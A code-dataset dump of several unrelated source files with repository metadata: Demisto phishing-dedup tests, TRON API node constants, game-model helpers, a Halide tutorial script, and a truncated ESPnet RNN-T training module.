mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text[:-5], emailfrom='mt.kb.user@gmail.co')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_html_text(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID, text, text2
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
html = '<!DOCTYPE html>\
<html>\
<body>\
<h1>{}</h1>\
<p>{}</p>\
</body>\
</html>\
'.format(text, text2)
clean_text = '{}\n{}'.format(text, text2)
existing_incident = create_incident(body=clean_text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(html=html, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
| 46.520737
| 117
| 0.750173
|
from CommonServerPython import *
from PhishingDedupPreprocessingRule import *
import json
ID_CONtER = 0
EXISTING_INCIDENTS = []
RESULTS = None
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
IDS_COUNTER = 0
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
text2 = "Love of my life, you've hurt me You've broken my heart and now you leave me Love of my life, can't you see?\
Bring it back, bring it back Don't take it away from me, because you don't know What it means to me"
def create_incident(subject=None, body=None, html=None, emailfrom=None):
global IDS_COUNTER
incident = {
"CustomFields": {},
"id": str(IDS_COUNTER),
"name": ' '.join(str(x) for x in [subject, body, html, emailfrom, id])
}
IDS_COUNTER += 1
if subject is not None:
incident['CustomFields']['emailsubject'] = subject
if body is not None:
incident['CustomFields']['emailbody'] = body
if html is not None:
incident['CustomFields']['emailbodyhtml'] = html
if emailfrom is not None:
incident['CustomFields']['emailfrom'] = emailfrom
return incident
def set_existing_incidents_list(incidents_list):
global EXISTING_INCIDENTS
EXISTING_INCIDENTS = incidents_list
def executeCommand(command, args=None):
global EXISTING_INCIDENTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
if command == 'GetIncidentsByQuery':
incidents_str = json.dumps(EXISTING_INCIDENTS)
return [{'Contents': incidents_str, 'Type': 'not error'}]
if command == 'linkIncidents':
EXISTING_INCIDENT_ID = args['incidentId']
DUP_INCIDENT_ID = args['linkedIncidentIDs']
def results(arg):
global RESULTS
RESULTS = arg
def duplicated_incidents_found(existing_incident):
return existing_incident['id'] == EXISTING_INCIDENT_ID
def test_same_incidents_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_different_text_only(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_different_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
text = "Imagine there's no countries It isn't hard to do Nothing to kill or die for And no religion too " \
"Imagine all the people Living life in peace"
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_exact_sender_match_same_senders_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Exact'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_senders(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
def test_same_incidents_domain_sender_match_same_domain_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text2, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_slightly_different_texts(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
existing_incident = create_incident(body=text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'TextOnly'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(body=text[:-5], emailfrom='mt.kb.user@gmail.co')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert not duplicated_incidents_found(existing_incident)
def test_html_text(mocker):
global RESULTS, EXISTING_INCIDENT_ID, DUP_INCIDENT_ID, text, text2
EXISTING_INCIDENT_ID = DUP_INCIDENT_ID = None
html = '<!DOCTYPE html>\
<html>\
<body>\
<h1>{}</h1>\
<p>{}</p>\
</body>\
</html>\
'.format(text, text2)
clean_text = '{}\n{}'.format(text, text2)
existing_incident = create_incident(body=clean_text, emailfrom='mt.kb.user@gmail.com')
set_existing_incidents_list([existing_incident])
mocker.patch.object(demisto, 'args', return_value={'fromPolicy': 'Domain'})
mocker.patch.object(demisto, 'executeCommand', side_effect=executeCommand)
new_incident = create_incident(html=html, emailfrom='mt.kb.user2@gmail.com')
mocker.patch.object(demisto, 'incidents', return_value=[new_incident])
mocker.patch.object(demisto, 'results', side_effect=results)
main()
assert duplicated_incidents_found(existing_incident)
| true
| true
|
1c3eafa1dc15b9815c461f8e4e81effe44ea1d93
| 582
|
py
|
Python
|
tronapi/constants.py
|
oushu1zhangxiangxuan1/tron-api-python
|
d93959e758fb967584ad36372e29ab67eaa6dc79
|
[
"MIT"
] | 111
|
2018-10-15T19:49:31.000Z
|
2022-03-26T02:48:37.000Z
|
tronapi/constants.py
|
oushu1zhangxiangxuan1/tron-api-python
|
d93959e758fb967584ad36372e29ab67eaa6dc79
|
[
"MIT"
] | 83
|
2018-10-24T18:49:56.000Z
|
2022-03-02T21:36:21.000Z
|
tronapi/constants.py
|
oushu1zhangxiangxuan1/tron-api-python
|
d93959e758fb967584ad36372e29ab67eaa6dc79
|
[
"MIT"
] | 78
|
2018-10-16T06:29:10.000Z
|
2022-03-18T04:39:53.000Z
|
# --------------------------------------------------------------------
# Copyright (c) iEXBase. All rights reserved.
# Licensed under the MIT License.
# See License.txt in the project root for license information.
# --------------------------------------------------------------------
# Here we specify default values for the different needed urls.
# They are verified. Don't change this unless you know what you're doing.
DEFAULT_NODES = {
'full_node': 'https://api.trongrid.io',
'solidity_node': 'https://api.trongrid.io',
'event_server': 'https://api.trongrid.io'
}
| 41.571429
| 73
| 0.546392
|
DEFAULT_NODES = {
'full_node': 'https://api.trongrid.io',
'solidity_node': 'https://api.trongrid.io',
'event_server': 'https://api.trongrid.io'
}
| true
| true
|
1c3eb035ee715827be07854c75e698fafd898d35
| 3,278
|
py
|
Python
|
model/model_api.py
|
thukg/KG-concept-game
|
daedea0f9109012a079833de034766ad23c731b6
|
[
"MIT"
] | 1
|
2019-09-27T11:05:17.000Z
|
2019-09-27T11:05:17.000Z
|
model/model_api.py
|
thukg/KG-concept-game
|
daedea0f9109012a079833de034766ad23c731b6
|
[
"MIT"
] | null | null | null |
model/model_api.py
|
thukg/KG-concept-game
|
daedea0f9109012a079833de034766ad23c731b6
|
[
"MIT"
] | null | null | null |
from model.random_model import RandomModel
from model.greedy_model import GreedyModel
from model.min_max_model import MinMaxModel
from model.alpha_beta_model import AlphaBetaModel
from model.sprague_grundy_model import SpragueGrundyModel
from model.fully_connected_network_model import FCNModel
import config
def name_to_model(s, env):
s = s.lower()
assert s in config.model_list
model = None
if s == 'random':
model = RandomModel(env)
if s == 'greedy-p0':
model = GreedyModel(env, 0)
if s == 'greedy-p1':
model = GreedyModel(env, 1)
if s == 'greedy-p2':
model = GreedyModel(env, 2)
if s == 'minmax-p0':
model = MinMaxModel(env, 0)
if s == 'minmax-p1':
model = MinMaxModel(env, 1)
if s == 'minmax-p2':
model = MinMaxModel(env, 2)
if s == 'ab-p0':
model = AlphaBetaModel(env, 0)
if s == 'ab-p1':
model = AlphaBetaModel(env, 1)
if s == 'ab-p2':
model = AlphaBetaModel(env, 2)
if s == 'sg':
model = SpragueGrundyModel(env)
if s == 'fcn':
model = FCNModel(env)
model.name = s
return model
def get_candidates(player, labels, graph_mat):
n = len(labels)
candidates = []
s = sum([player == l for l in labels])
for i in range(n):
if labels[i] == 0 and (s == 0 or sum([labels[j] == player for j in range(n) if graph_mat[i, j] > 0])):
candidates.append(i)
return candidates
def bfs(f, mat):
n = len(f)
g = [i for i in range(n) if f[i] == 0]
while g:
t = g[0]
for i in range(n):
if mat[t, i] > 0:
if f[i] > f[t] + 1:
f[i] = f[t] + 1
g.append(i)
g = g[1:]
return f
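# Editor's note (hedged, not part of the original module): bfs() runs a
# multi-source breadth-first search over the adjacency matrix, starting from
# every node whose entry in ``f`` is 0; entries pre-set to -1 can never be
# relaxed and therefore block propagation.  Tiny sketch on a hypothetical
# 3-node path graph 0-1-2:
#   >>> import numpy as np
#   >>> mat = np.array([[0, 1, 0], [1, 0, 1], [0, 1, 0]])
#   >>> bfs([0, 3, 3], mat)   # -> [0, 1, 2]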
def value_func0(player, labels, graph_mat, graph_dis):
n = len(labels)
g = [[], [], []]
for i in range(n):
g[labels[i]].append(i)
s = 0
for l0 in g[0]:
min1 = min([n]+[graph_dis[i, l0] for i in g[1]])
min2 = min([n]+[graph_dis[i, l0] for i in g[2]])
if min1 < min2:
s += (player == 1)
if min1 > min2:
s += (player == 2)
return s
def value_func1(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = 0
for i in range(n):
if labels[i] == 0:
if self_f[i] < oppo_f[i]:
s += 1
if self_f[i] > oppo_f[i]:
s -= 1
return s
def value_func2(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = sum([-self_f[i]+oppo_f[i] for i in range(n) if labels[i] == 0])
return s
value_funcs = [value_func0, value_func1, value_func2]
| 29.00885
| 110
| 0.527761
|
from model.random_model import RandomModel
from model.greedy_model import GreedyModel
from model.min_max_model import MinMaxModel
from model.alpha_beta_model import AlphaBetaModel
from model.sprague_grundy_model import SpragueGrundyModel
from model.fully_connected_network_model import FCNModel
import config
def name_to_model(s, env):
s = s.lower()
assert s in config.model_list
model = None
if s == 'random':
model = RandomModel(env)
if s == 'greedy-p0':
model = GreedyModel(env, 0)
if s == 'greedy-p1':
model = GreedyModel(env, 1)
if s == 'greedy-p2':
model = GreedyModel(env, 2)
if s == 'minmax-p0':
model = MinMaxModel(env, 0)
if s == 'minmax-p1':
model = MinMaxModel(env, 1)
if s == 'minmax-p2':
model = MinMaxModel(env, 2)
if s == 'ab-p0':
model = AlphaBetaModel(env, 0)
if s == 'ab-p1':
model = AlphaBetaModel(env, 1)
if s == 'ab-p2':
model = AlphaBetaModel(env, 2)
if s == 'sg':
model = SpragueGrundyModel(env)
if s == 'fcn':
model = FCNModel(env)
model.name = s
return model
def get_candidates(player, labels, graph_mat):
n = len(labels)
candidates = []
s = sum([player == l for l in labels])
for i in range(n):
if labels[i] == 0 and (s == 0 or sum([labels[j] == player for j in range(n) if graph_mat[i, j] > 0])):
candidates.append(i)
return candidates
def bfs(f, mat):
n = len(f)
g = [i for i in range(n) if f[i] == 0]
while g:
t = g[0]
for i in range(n):
if mat[t, i] > 0:
if f[i] > f[t] + 1:
f[i] = f[t] + 1
g.append(i)
g = g[1:]
return f
def value_func0(player, labels, graph_mat, graph_dis):
n = len(labels)
g = [[], [], []]
for i in range(n):
g[labels[i]].append(i)
s = 0
for l0 in g[0]:
min1 = min([n]+[graph_dis[i, l0] for i in g[1]])
min2 = min([n]+[graph_dis[i, l0] for i in g[2]])
if min1 < min2:
s += (player == 1)
if min1 > min2:
s += (player == 2)
return s
def value_func1(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = 0
for i in range(n):
if labels[i] == 0:
if self_f[i] < oppo_f[i]:
s += 1
if self_f[i] > oppo_f[i]:
s -= 1
return s
def value_func2(player, labels, graph_mat, graph_dis):
n = len(labels)
self_f, oppo_f = [n]*n, [n]*n
for i in range(n):
if labels[i] == player:
self_f[i] = 0
oppo_f[i] = -1
if labels[i] == 3-player:
self_f[i] = -1
oppo_f[i] = 0
self_f = bfs(self_f, graph_mat)
oppo_f = bfs(oppo_f, graph_mat)
s = sum([-self_f[i]+oppo_f[i] for i in range(n) if labels[i] == 0])
return s
value_funcs = [value_func0, value_func1, value_func2]
| true
| true
|
1c3eb15d7da6787510d8cb568e87d91b919b684c
| 2,109
|
py
|
Python
|
python_bindings/tutorial/lesson_10_aot_compilation_run.py
|
OAID/Halide
|
769b8554ec36b70ea53c73605ad021cf431476fc
|
[
"Apache-2.0"
] | 4,303
|
2015-01-02T12:04:37.000Z
|
2022-03-31T11:35:06.000Z
|
python_bindings/tutorial/lesson_10_aot_compilation_run.py
|
OAID/Halide
|
769b8554ec36b70ea53c73605ad021cf431476fc
|
[
"Apache-2.0"
] | 4,323
|
2015-01-01T13:31:25.000Z
|
2022-03-31T22:43:57.000Z
|
python_bindings/tutorial/lesson_10_aot_compilation_run.py
|
OAID/Halide
|
769b8554ec36b70ea53c73605ad021cf431476fc
|
[
"Apache-2.0"
] | 1,032
|
2015-01-12T12:50:16.000Z
|
2022-03-28T01:55:11.000Z
|
# Before reading this file, see lesson_10_aot_compilation_generate.py
# This is the code that actually uses the Halide pipeline we've
# compiled. It does not depend on libHalide, so we won't do
# "import halide".
#
# Instead, it depends on the header file that lesson_10_generate
# produced when we ran it:
import lesson_10_halide
import numpy as np
def main():
# Have a look at the generated files above (they won't exist until you've run
# lesson_10_generate): lesson_10_halide.py.cpp, lesson_10_halide.h
#
# In the header file, the generated function is represented like this:
# int lesson_10_halide(halide_buffer_t*, uint8_t, halide_buffer_t*);
#
# lesson_10_halide.py.cpp creates a Python wrapper around this function.
# Buffers are converted using the Python buffer API:
#
# https://docs.python.org/2/c-api/buffer.html
# https://docs.python.org/3/c-api/buffer.html
#
# In other words, you can pass numpy arrays directly to the generated
# code.
# Let's make some input data to test with:
input = np.empty((640, 480), dtype=np.uint8, order='F')
for y in range(480):
for x in range(640):
input[x, y] = x ^ (y + 1)
# And the memory where we want to write our output:
output = np.empty((640, 480), dtype=np.uint8, order='F')
offset_value = 5
lesson_10_halide.lesson_10_halide(input, offset_value, output)
# Now let's check the filter performed as advertised. It was
# supposed to add the offset to every input pixel.
correct_val = np.empty((1), dtype=np.uint8)
for y in range(480):
for x in range(640):
input_val = input[x, y]
output_val = output[x, y]
correct_val[0] = input_val
# we add over a uint8 value (will properly model overflow)
correct_val[0] += offset_value
assert output_val == correct_val[0], \
"output(%d, %d) was %d instead of %d" % (x, y, output_val, correct_val)
# Everything worked!
print("Success!")
return 0
if __name__ == "__main__":
main()
| 33.47619
| 87
| 0.656235
|
# compiled. It does not depend on libHalide, so we won't do
import lesson_10_halide
import numpy as np
def main():
input = np.empty((640, 480), dtype=np.uint8, order='F')
for y in range(480):
for x in range(640):
input[x, y] = x ^ (y + 1)
# And the memory where we want to write our output:
output = np.empty((640, 480), dtype=np.uint8, order='F')
offset_value = 5
lesson_10_halide.lesson_10_halide(input, offset_value, output)
# Now let's check the filter performed as advertised. It was
correct_val = np.empty((1), dtype=np.uint8)
for y in range(480):
for x in range(640):
input_val = input[x, y]
output_val = output[x, y]
correct_val[0] = input_val
correct_val[0] += offset_value
assert output_val == correct_val[0], \
"output(%d, %d) was %d instead of %d" % (x, y, output_val, correct_val)
print("Success!")
return 0
if __name__ == "__main__":
main()
| true
| true
|
1c3eb3b6d07c2dc5556bce9a07ea0abe005bbfa9
| 52,497
|
py
|
Python
|
espnet/asr/pytorch_backend/asr_rnn_t.py
|
Baileyswu/espnet
|
7ce470058f8fdb28db00ec2d0bd51d290b109d3b
|
[
"Apache-2.0"
] | null | null | null |
espnet/asr/pytorch_backend/asr_rnn_t.py
|
Baileyswu/espnet
|
7ce470058f8fdb28db00ec2d0bd51d290b109d3b
|
[
"Apache-2.0"
] | null | null | null |
espnet/asr/pytorch_backend/asr_rnn_t.py
|
Baileyswu/espnet
|
7ce470058f8fdb28db00ec2d0bd51d290b109d3b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# encoding: utf-8
# Copyright 2017 Johns Hopkins University (Shinji Watanabe)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Training/decoding definition for the speech recognition task."""
import copy
import json
import logging
import math
import os
import sys
from chainer import reporter as reporter_module
from chainer import training
from chainer.training import extensions
from chainer.training.updater import StandardUpdater
import numpy as np
from tensorboardX import SummaryWriter
import torch
from torch.nn.parallel import data_parallel
from espnet.asr.asr_utils import adadelta_eps_decay
from espnet.asr.asr_utils import add_results_to_json
from espnet.asr.asr_utils import CompareValueTrigger
from espnet.asr.asr_utils import format_mulenc_args
from espnet.asr.asr_utils import get_model_conf
from espnet.asr.asr_utils import plot_spectrogram
from espnet.asr.asr_utils import restore_snapshot
from espnet.asr.asr_utils import snapshot_object
from espnet.asr.asr_utils import torch_load
from espnet.asr.asr_utils import torch_resume
from espnet.asr.asr_utils import torch_snapshot
from espnet.asr.pytorch_backend.asr_init_rnn_t import freeze_modules
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_model
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_modules
import espnet.lm.pytorch_backend.extlm as extlm_pytorch
from espnet.nets.asr_interface import ASRInterface
from espnet.nets.beam_search_transducer import BeamSearchTransducer
from espnet.nets.pytorch_backend.e2e_asr import pad_list
import espnet.nets.pytorch_backend.lm.default as lm_pytorch
from espnet.nets.pytorch_backend.streaming.segment import SegmentStreamingE2E
from espnet.nets.pytorch_backend.streaming.window import WindowStreamingE2E
from espnet.transform.spectrogram import IStft
from espnet.transform.transformation import Transformation
from espnet.utils.cli_writers import file_writer_helper
from espnet.utils.dataset import ChainerDataLoader
from espnet.utils.dataset import TransformDataset
from espnet.utils.deterministic_utils import set_deterministic_pytorch
from espnet.utils.dynamic_import import dynamic_import
from espnet.utils.io_utils import LoadInputsAndTargets
from espnet.utils.training.batchfy import make_batchset
from espnet.utils.training.evaluator import BaseEvaluator
from espnet.utils.training.iterators import ShufflingEnabler
from espnet.utils.training.tensorboard_logger import TensorboardLogger
from espnet.utils.training.train_utils import check_early_stop
from espnet.utils.training.train_utils import set_early_stop
import matplotlib
matplotlib.use("Agg")
if sys.version_info[0] == 2:
from itertools import izip_longest as zip_longest
else:
from itertools import zip_longest as zip_longest
def _recursive_to(xs, device):
if torch.is_tensor(xs):
return xs.to(device)
if isinstance(xs, tuple):
return tuple(_recursive_to(x, device) for x in xs)
return xs
class CustomEvaluator(BaseEvaluator):
"""Custom Evaluator for Pytorch.
Args:
model (torch.nn.Module): The model to evaluate.
iterator (chainer.dataset.Iterator) : The train iterator.
target (link | dict[str, link]) :Link object or a dictionary of
links to evaluate. If this is just a link object, the link is
registered by the name ``'main'``.
device (torch.device): The device used.
ngpu (int): The number of GPUs.
"""
def __init__(self, model, iterator, target, device, ngpu=None):
super(CustomEvaluator, self).__init__(iterator, target)
self.model = model
self.device = device
if ngpu is not None:
self.ngpu = ngpu
elif device.type == "cpu":
self.ngpu = 0
else:
self.ngpu = 1
# The core part of the update routine can be customized by overriding
def evaluate(self):
"""Main evaluate routine for CustomEvaluator."""
iterator = self._iterators["main"]
if self.eval_hook:
self.eval_hook(self)
if hasattr(iterator, "reset"):
iterator.reset()
it = iterator
else:
it = copy.copy(iterator)
summary = reporter_module.DictSummary()
self.model.eval()
with torch.no_grad():
for batch in it:
x = _recursive_to(batch, self.device)
observation = {}
with reporter_module.report_scope(observation):
# read scp files
# x: original json with loaded features
# will be converted to chainer variable later
if self.ngpu == 0:
self.model(*x)
else:
# apex does not support torch.nn.DataParallel
data_parallel(self.model, x, range(self.ngpu))
summary.add(observation)
self.model.train()
return summary.compute_mean()
class CustomUpdater(StandardUpdater):
"""Custom Updater for Pytorch.
Args:
model (torch.nn.Module): The model to update.
grad_clip_threshold (float): The gradient clipping value to use.
train_iter (chainer.dataset.Iterator): The training iterator.
optimizer (torch.optim.optimizer): The training optimizer.
device (torch.device): The device to use.
ngpu (int): The number of gpus to use.
use_apex (bool): The flag to use Apex in backprop.
"""
def __init__(
self,
model,
grad_clip_threshold,
train_iter,
optimizer,
device,
ngpu,
grad_noise=False,
accum_grad=1,
use_apex=False,
):
super(CustomUpdater, self).__init__(train_iter, optimizer)
self.model = model
self.grad_clip_threshold = grad_clip_threshold
self.device = device
self.ngpu = ngpu
self.accum_grad = accum_grad
self.forward_count = 0
self.grad_noise = grad_noise
self.iteration = 0
self.use_apex = use_apex
# The core part of the update routine can be customized by overriding.
def update_core(self):
"""Main update routine of the CustomUpdater."""
# When we pass one iterator and optimizer to StandardUpdater.__init__,
# they are automatically named 'main'.
train_iter = self.get_iterator("main")
optimizer = self.get_optimizer("main")
epoch = train_iter.epoch
# Get the next batch (a list of json files)
batch = train_iter.next()
# self.iteration += 1 # Increase may result in early report,
# which is done in other place automatically.
x = _recursive_to(batch, self.device)
is_new_epoch = train_iter.epoch != epoch
# When the last minibatch in the current epoch is given,
# gradient accumulation is turned off in order to evaluate the model
# on the validation set in every epoch.
# see details in https://github.com/espnet/espnet/pull/1388
# Compute the loss at this time step and accumulate it
if self.ngpu == 0:
loss = self.model(*x).mean() / self.accum_grad
else:
# apex does not support torch.nn.DataParallel
loss = (
data_parallel(self.model, x, range(self.ngpu)).mean() / self.accum_grad
)
if self.use_apex:
from apex import amp
# NOTE: for a compatibility with noam optimizer
opt = optimizer.optimizer if hasattr(optimizer, "optimizer") else optimizer
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
# gradient noise injection
if self.grad_noise:
from espnet.asr.asr_utils import add_gradient_noise
add_gradient_noise(
self.model, self.iteration, duration=100, eta=1.0, scale_factor=0.55
)
# update parameters
self.forward_count += 1
if not is_new_epoch and self.forward_count != self.accum_grad:
return
self.forward_count = 0
# compute the gradient norm to check if it is normal or not
grad_norm = torch.nn.utils.clip_grad_norm_(
self.model.parameters(), self.grad_clip_threshold
)
logging.info("grad norm={}".format(grad_norm))
if math.isnan(grad_norm):
logging.warning("grad norm is nan. Do not update model.")
else:
optimizer.step()
optimizer.zero_grad()
def update(self):
self.update_core()
# #iterations with accum_grad > 1
# Ref.: https://github.com/espnet/espnet/issues/777
if self.forward_count == 0:
self.iteration += 1
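# A small numeric sketch (standalone, hypothetical values) of the gradient accumulation
# scheme in CustomUpdater.update_core: every minibatch loss is scaled by 1/accum_grad
# before backward(), and optimizer.step() runs once per accum_grad forward passes, so
# the applied gradient corresponds to the average over those minibatches.
def _accumulated_loss_example(minibatch_losses, accum_grad):
    """Return the total loss backpropagated across one optimizer step under accumulation."""
    assert len(minibatch_losses) == accum_grad
    return sum(loss / accum_grad for loss in minibatch_losses)
# e.g. _accumulated_loss_example([1.0, 3.0], accum_grad=2) == 2.0, i.e. the plain average.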
class CustomConverter(object):
"""Custom batch converter for Pytorch.
Args:
subsampling_factor (int): The subsampling factor.
dtype (torch.dtype): Data type to convert.
"""
def __init__(self, subsampling_factor=1, dtype=torch.float32):
"""Construct a CustomConverter object."""
self.subsampling_factor = subsampling_factor
self.ignore_id = -1
self.dtype = dtype
def __call__(self, batch, device=torch.device("cpu")):
"""Transform a batch and send it to a device.
Args:
batch (list): The batch to transform.
device (torch.device): The device to send to.
Returns:
tuple(torch.Tensor, torch.Tensor, torch.Tensor)
"""
# batch should be located in list
assert len(batch) == 1
xs, ys = batch[0]
# perform subsampling
if self.subsampling_factor > 1:
xs = [x[:: self.subsampling_factor, :] for x in xs]
# get batch of lengths of input sequences
ilens = np.array([x.shape[0] for x in xs])
# perform padding and convert to tensor
# currently only support real number
if xs[0].dtype.kind == "c":
xs_pad_real = pad_list(
[torch.from_numpy(x.real).float() for x in xs], 0
).to(device, dtype=self.dtype)
xs_pad_imag = pad_list(
[torch.from_numpy(x.imag).float() for x in xs], 0
).to(device, dtype=self.dtype)
# Note(kamo):
# {'real': ..., 'imag': ...} will be changed to ComplexTensor in E2E.
# Don't create a ComplexTensor and pass it to E2E here
# because torch.nn.DataParallel can't handle it.
xs_pad = {"real": xs_pad_real, "imag": xs_pad_imag}
else:
xs_pad = pad_list([torch.from_numpy(x).float() for x in xs], 0).to(
device, dtype=self.dtype
)
ilens = torch.from_numpy(ilens).to(device)
# NOTE: this is for multi-output (e.g., speech translation)
ys_pad = pad_list(
[
torch.from_numpy(
